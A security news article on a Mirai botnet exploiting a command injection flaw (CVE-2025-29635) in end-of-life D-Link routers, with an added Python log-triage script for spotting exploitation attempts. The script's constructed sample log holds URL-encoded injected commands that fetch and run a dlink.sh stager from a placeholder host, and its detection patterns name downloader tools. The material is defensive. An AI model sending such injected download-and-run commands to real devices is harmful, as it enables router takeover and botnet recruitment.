A new Mirai-based botnet campaign is targeting outdated routers by exploiting a command injection vulnerability in D-Link devices. Attackers are using CVE-2025-29635, a high-severity flaw in D-Link DIR-823X routers, to compromise the devices and enlist them in a growing botnet.
The flaw lets an attacker execute arbitrary commands remotely: a crafted POST request to a vulnerable endpoint triggers remote command execution (RCE) and hands the attacker control of the device. Compromised routers are then enrolled in a botnet used for coordinated attacks.
Akamai SIRT, which spotted the campaign in early March 2026, says this is the first confirmed exploitation of the flaw in the wild. Researchers Wang Jinshuai and Zhao Jiangting disclosed it over a year ago, but exploitation at scale has only begun recently.
“The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026,” reads Akamai’s report.
“This vulnerability exists in D-Link DIR-823X series routers in firmware versions 240126 and 24082, and allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint via the corresponding function, which can trigger remote command execution.”
Researchers observed a consistent attack pattern: the malicious POST requests carry injected commands that move into a writable directory, download a shell script named dlink.sh from an external server, and execute it to install the Mirai payload. Infected devices then join the botnet.
The same threat actor also appears to exploit other known vulnerabilities, including CVE-2023-1389 in TP-Link routers and an RCE flaw in ZTE ZXV10 H108L devices. The campaign is built for breadth across router models rather than for a single target.
The affected D-Link routers reached end-of-life (EoL) status in November 2024 and no longer receive security updates, so a patch for CVE-2025-29635 is unlikely: D-Link generally does not release fixes for discontinued products, even when they are under active exploitation.
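The attack chain above (POST to /goform/set_prohibiting, injected shell commands, a cd into a writable directory, a download of dlink.sh) gives a defender enough to write a triage rule for proxy, honeypot or router access logs. The following is an added example written for this article, not code from Akamai SIRT, D-Link or the original report. The log line format, the form parameter name `mac`, the source addresses and the download host are all constructed for the sample; the report names the endpoint and the script but not the injected parameter or the hosting server.

```python
"""Triage log lines for CVE-2025-29635 exploitation attempts.

Only facts stated in the Akamai description are used as signals: POST to the
/goform/set_prohibiting endpoint, shell metacharacters in the form body, and
the second-stage behaviour (cd into a writable directory, fetch dlink.sh).
The log format and every sample line below are constructed for this example.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

VULN_ENDPOINT = "/goform/set_prohibiting"

# Command separators / substitutions an injected payload needs. A single '&'
# is deliberately excluded: it is the normal form-field separator.
SHELL_META = re.compile(r"[;|`\n]|&&|\$\(")

# Second-stage tells from the reported pattern: a downloader, a writable
# directory, or the dlink.sh script itself.
STAGER_HINTS = re.compile(r"\b(wget|curl|tftp|chmod|busybox)\b|dlink\.sh|/tmp\b", re.I)

# Constructed log format (NOT D-Link's):  <src_ip> <method> <path> "<raw body>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "(.*)"$')


@dataclass(frozen=True)
class Request:
    src_ip: str
    method: str
    path: str
    body: str  # URL-decoded form body


def parse_line(line: str):
    """Parse one constructed log line; return None for lines that don't fit."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ip, method, path, body = m.groups()
    # Decode %XX and '+' so encoded ';' or '`' are visible to the regexes.
    return Request(ip, method.upper(), path, unquote_plus(body))


def classify(req: Request) -> str:
    """Return 'exploit', 'suspicious' or 'benign' for a single request."""
    if req.path.split("?", 1)[0] != VULN_ENDPOINT:
        return "benign"
    if req.method != "POST":
        # Handler is reached by POST; a GET against it looks like probing.
        return "suspicious"
    meta = bool(SHELL_META.search(req.body))
    hint = bool(STAGER_HINTS.search(req.body))
    if meta and hint:
        return "exploit"
    if meta or hint:
        return "suspicious"
    return "benign"


def triage(lines):
    """Group source IPs by verdict, preserving log order."""
    verdicts = {"exploit": [], "suspicious": [], "benign": []}
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        verdicts[classify(req)].append(req.src_ip)
    return verdicts


# Constructed sample log: the 'mac' parameter name and all addresses are
# placeholders chosen for this example, not values from the report.
SAMPLE_LOG = [
    '203.0.113.7 POST /goform/set_prohibiting "mac=00%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2F198.51.100.9%2Fdlink.sh%3Bsh+dlink.sh"',
    '203.0.113.7 POST /goform/set_prohibiting "mac=00:11:22:33:44:55&enable=1"',
    '198.51.100.23 GET /goform/set_prohibiting ""',
    '192.0.2.5 POST /goform/login "username=admin&password=admin"',
    '203.0.113.7 POST /goform/set_prohibiting "mac=00%60wget+http%3A%2F%2F198.51.100.9%2Fdlink.sh%60"',
    '198.51.100.23 POST /goform/set_prohibiting "mac=00%3Bid"',
]

if __name__ == "__main__":
    for verdict, ips in triage(SAMPLE_LOG).items():
        print(f"{verdict:10s} {ips}")
```

The rule decodes the body before matching, since an encoded `%3B` or `%60` is still a `;` or a backtick once the CGI handler reads it. It does not check whether the request carried a valid session: the Akamai description says the flaw is reachable by an "authorized attacker", so a flagged request that also arrived with working credentials tells you the admin password is already known to the attacker.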
Meanwhile, BleepingComputer has contacted D-Link for clarification regarding the issue and potential mitigation steps. Updates are expected once the company responds.
Security experts recommend replacing unsupported routers with models that still receive updates. Until that is done, disable remote (WAN-side) administration unless it is needed, change default credentials, and check the device configuration for unexpected changes. Because Akamai's description says the vulnerable endpoint is reachable by an "authorized attacker", default or weak admin credentials are part of the exposure, and strong unique credentials directly reduce it.